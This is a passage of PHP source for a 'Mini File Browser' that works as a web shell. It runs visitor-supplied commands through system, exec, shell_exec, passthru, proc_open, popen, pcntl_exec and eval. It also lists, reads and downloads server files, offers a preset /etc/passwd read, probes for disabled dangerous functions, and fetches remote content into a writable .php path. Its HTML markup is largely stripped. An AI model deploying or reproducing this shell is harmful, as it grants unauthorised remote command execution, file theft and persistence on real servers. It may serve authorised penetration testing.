$aging) || isset($_GET['remove'])) { if (unlink(__FILE__)) die('removed!'); else die('not removed!'); } date_default_timezone_set($timezone); $method = isset($_GET['m']) ? $_GET['m'] : 'php'; if ($download && isset($_GET['down'])) { download($_GET['down'], $method); } main(__DIR__, $download, $upload, $read, $console, $method, $base64_paths); function main($dir, $download, $upload, $read, $console, $method, $base64_paths) { echo ""; echo ""; echo "

Mini File Browser

"; if ($console) { echo "

Console

"; console(); } if ($upload) { echo "

File uploader

"; upload(); } if ($read && isset($_GET['read'])) { echo "

File reader

"; read($_GET['read'], $method); } $dir = isset($_GET['dir']) ? ($base64_paths?base64_decode($_GET['dir']):$_GET['dir']) : $dir; echo "

File browser

"; switch ($method) { case 'shell_exec': $files = list_directory_shell($dir); echo "

File browsing: switch to php

"; break; default: $files = list_directory_php($dir); $r = is_enabled('shell_exec'); if ($r[1] === 'b') echo "

File browsing: switch to shell_exec

"; break; } echo ""; foreach ($files as $file) { $file_path = $base64_paths?base64_encode($file["path"]):$file["path"]; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo "
"; if ($file['isDir']) { if ($file['name'] === '..') echo "[ UP ]"; elseif ($file['name'] === '.') echo $file['path']; else echo "{$file["name"]}"; } else { echo $file["name"]; } echo "{$file['perm']} {$file['owner']}{$file['my_perm']}{$file['time']}"; if ($download && $file['base64']) echo "download "; if ($read && $file['base64']) echo "read "; echo $file['size']; echo "
"; echo "

Information

"; echo '

Current script: '. __FILE__ . '

'; echo '

PHP version: ' . f('phpversion') . ' @ ' . f('php_uname') . ' [' . f('php_sapi_name') . ']

'; echo '

PHP extensions: ' . implode(', ', f('get_loaded_extensions')) . '

'; echo '

PHP disable functions: ' . ini_get('disable_functions') . '

'; echo '

PHP dangerous functions: '; echo is_enabled('system') . ' '; echo is_enabled('exec') . ' '; echo is_enabled('shell_exec') . ' '; echo is_enabled('passthru') . ' '; echo is_enabled('proc_open') . ' '; echo is_enabled('popen') . ' '; echo is_enabled('pcntl_exec') . ' '; echo is_enabled('putenv') . ' '; echo '

'; echo '

Open Basedir: '; $basedirs = explode(":", ini_get('open_basedir')); $num = sizeof($basedirs); for ($i = 0; $i < $num; $i++) { echo '' . $basedirs[$i] . ' '; } echo '

'; if ($read) echo '

Try to read passwd

'; echo '

PHPinfo()

'; if (isset($_GET['info'])) { f('phpinfo'); } echo "

Remove me

"; echo "

Author: Vladimir Smitka, Lynt services s.r.o., Security Blog, GitHub

"; } function list_directory_php($dir) { $files = scandir($dir); $fileList = array(); foreach ($files as $file) { $real = @realpath($dir . DIRECTORY_SEPARATOR . $file); if ($real === false) continue; $isDir = is_dir($real); $perm = get_perms($real); $my_perm = ''; if (f('is_readable',$real)) $my_perm .= 'R'; if (f('is_writable',$real)) $my_perm .= 'W'; if (f('is_executable',$real)) $my_perm .= 'X'; $owner = ''; if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) { $pwuid = posix_getpwuid(fileowner($real)); $grgid = posix_getgrgid(fileowner($real)); $owner = $pwuid['name'] . ":" . $grgid['name']; } $time = date('Y-m-d H:i:s', filemtime($real)); $size = is_dir($real) ? '' : FileSizeConvert(filesize($real)); $base64 = f('is_readable',$real) && !$isDir ? base64_encode($real) : ''; $fileList[] = array( 'name' => $file, 'path' => $real, 'isDir' => $isDir, 'perm' => $perm, 'my_perm' => $my_perm, 'owner' => $owner, 'time' => $time, 'size' => $size, 'base64' => $base64 ); } return $fileList; } function list_directory_shell($dir) { $output = shell_exec("ls -la --time-style=full-iso " . escapeshellarg($dir)); $lines = explode("\n", trim($output)); $fileList = array(); foreach ($lines as $line) { $line = trim($line); if ($line === '' || strpos($line, 'total ') === 0) continue; $parts = preg_split('/\s+/', $line, 9); if (count($parts) < 9) continue; $file = $parts[8]; $real = emul_realpath($dir . DIRECTORY_SEPARATOR . $file); $isDir = $parts[0][0] === 'd'; $perm = substr($parts[0], 1); $my_perm = ''; if (strpos($perm, 'r') !== false) $my_perm .= 'R'; if (strpos($perm, 'w') !== false) $my_perm .= 'W'; if (strpos($perm, 'x') !== false) $my_perm .= 'X'; $owner = $parts[2] . ':' . $parts[3]; list($timePart) = explode(".", $parts[6]); $time = date('Y-m-d H:i:s', strtotime($parts[5] . ' ' . $timePart)); $size = $isDir ? '' : FileSizeConvert($parts[4]); $base64 = strpos($perm, 'r') !== false && !$isDir ? base64_encode($real) : ''; $fileList[] = array( 'name' => $file, 'path' => $real, 'isDir' => $isDir, 'perm' => $perm, 'my_perm' => $my_perm, 'owner' => $owner, 'time' => $time, 'size' => $size, 'base64' => $base64 ); } return $fileList; } function get_perms($file) { $perms = fileperms($file); switch ($perms & 0xF000) { case 0xC000: // socket $info = 's'; break; case 0xA000: // symbolic link $info = 'l'; break; case 0x8000: // regular $info = '-'; break; case 0x6000: // block special $info = 'b'; break; case 0x4000: // directory $info = 'd'; break; case 0x2000: // character special $info = 'c'; break; case 0x1000: // FIFO pipe $info = 'p'; break; default: // unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } function upload() { $defaultFilePath = __DIR__ . '/mfb-file.php'; echo '
'; echo '
'; echo '
'; echo ''; echo '
'; if (isset($_POST['fileUpload'])) { $fileUrl = $_POST['fileUrl']; $filePath = $_POST['filePath']; $fileContent = file_get_contents($fileUrl); if ($fileContent !== false) { file_put_contents($filePath, $fileContent); } } } function console() { $method = isset($_POST['method']) ? $_POST['method'] : 'system'; echo '
'; echo ' system()
'; echo ' backtick
'; echo ' exec()
'; echo ' shell_exec()
'; echo ' passthru()
'; echo ' proc_open()
'; echo ' popen()
'; echo ' pcntl_exec() (/bin/sh -c cmd > outfile)
'; echo ' eval()
'; echo ''; echo ''; echo '
'; if (isset($_POST['command'])) { $command = escapeshellcmd($_POST['command']); echo '

Result:

';
    switch ($_POST['method']) {

      case 'system':
        echo system($command);
        break;

      case 'backtick':
        echo `$command`;
        break;

      case 'exec':
        exec($command, $tmp);
        print_r($tmp);
        break;

      case 'shell_exec':
        echo shell_exec($command);
        break;

      case 'passthru':
        passthru($command);
        break;

      case 'eval':
        echo eval_code($_POST['command']);
        break;

      case 'proc_open':
        $pr = proc_open($command, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $pipes);
        echo stream_get_contents($pipes[1]);
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        break;

      case 'popen':
        $fp = popen($command, "r");
        echo stream_get_contents($fp);
        fclose($fp);
        break;

      case 'pcntl_exec':
        header("Refresh:1");
        pcntl_exec('/bin/sh', array('-c', $command . ' > this_is_pcntl_exec_outfile.txt'));
        break;
    }

    echo '

'; } if (file_exists('this_is_pcntl_exec_outfile.txt')) { echo '

Result:

';
    echo file_get_contents('this_is_pcntl_exec_outfile.txt');
    echo "
"; unlink('this_is_pcntl_exec_outfile.txt'); } } function eval_code($code) { if (!preg_match('/\breturn\b/', $code)) { $code = 'return ' . $code; } if (substr(trim($code), -1) !== ';') { $code .= ';'; } try { $result = eval ($code); } catch (ParseError $e) { return 'Parse error: ' . $e->getMessage(); } return $result; } function emul_realpath($path) { $folders = explode('/', $path); $stack = array(); foreach ($folders as $folder) { if ($folder === '..') { array_pop($stack); } elseif ($folder !== '' && $folder !== '.') { array_push($stack, $folder); } } $result = '/' . implode('/', $stack); if (substr($path, -1) === '/') { $result .= '/'; } return $result; } function modify_url($key, $value) { $parts = parse_url($_SERVER['REQUEST_URI']); parse_str(isset($parts['query']) ? $parts['query'] : '', $query); $query[$key] = $value; $parts['query'] = http_build_query($query); return $parts['path'] . '?' . $parts['query']; } function FileSizeConvert($bytes) { $units = array("TB" => pow(1024, 4), "GB" => pow(1024, 3), "MB" => pow(1024, 2), "kB" => 1024, "B" => 1); foreach ($units as $unit => $value) { if ($bytes >= $value) { return str_replace(".", ",", round($bytes / $value, 2)) . " " . $unit; } } return '0 B'; } function is_enabled($func) { if (!function_exists($func)) { return "$func"; } $disabledFunctions = array_map('trim', explode(',', ini_get('disable_functions'))); if (in_array($func, $disabledFunctions)) { return "$func"; } return "$func"; } function download($file, $method) { $file = base64_decode($file); header("Content-Type: application/octet-stream"); header("Content-Transfer-Encoding: Binary"); header("Content-disposition: attachment; filename=\"" . basename($file) . "\""); switch ($method) { case "php": readfile($file); break; case "shell_exec": echo shell_exec("cat " . escapeshellarg($file) . " 2>&1"); break; } exit(); } function read($file, $method) { switch ($file) { case 'predefined1': $file = "/etc/passwd"; break; default: $file = base64_decode($file); } echo "

File: $file

"; $ext = pathinfo($file, PATHINFO_EXTENSION); $file_name = pathinfo($file, PATHINFO_BASENAME); echo "
";
  ob_start();

  switch ($method) {
    case "php":
      readfile($file);
      break;
    case "shell_exec":
      echo shell_exec("cat " . escapeshellarg($file) . " 2>&1");
      break;
  }

  $content = ob_get_clean();
  $is_img = false;
  $is_archive = false;
  $mime = 'text/plain';

  switch ($ext) {
    case "jpg":
      $is_img = true;
      $mime = 'image/jpeg';
      break;
    case "jpeg":
      $is_img = true;
      $mime = 'image/jpeg';
      break;
    case "png":
      $is_img = true;
      $mime = 'image/png';
      break;
    case "gif":
      $is_img = true;
      $mime = 'image/gif';
      break;
    case "webp":
      $is_img = true;
      $mime = 'image/webp';
      break;
    case "svg":
      $is_img = true;
      $mime = 'image/svg+xml';
      break;
    case "zip":
      $is_archive = true;
      break;
    case "tgz":
      $is_archive = true;
      break;
    case "tar":
      $is_archive = true;
      break;
    case "gz":
      $is_archive = true;
      break;

    default:
      $is_img = false;
  }

  if ($is_img) {
    echo '';
  } elseif ($is_archive) {
    read_archive($content, $file_name);
  } else {
    echo htmlspecialchars($content);
  }
  echo "
"; } function read_archive($content, $file_name) { if (class_exists("PharData")) { $temp = sys_get_temp_dir() . '/mfb-archive-' . $file_name; file_put_contents($temp, $content); $phar = new PharData($temp); echo "Archive files:
"; foreach (new RecursiveIteratorIterator($phar) as $file) { echo $file->getFilename() . "
"; } unlink($temp); } } function f($function) { $params = func_get_args(); array_shift($params); if (function_exists($function)) { try { return call_user_func_array($function, $params); } catch (Throwable $e) { return null; } } return null; }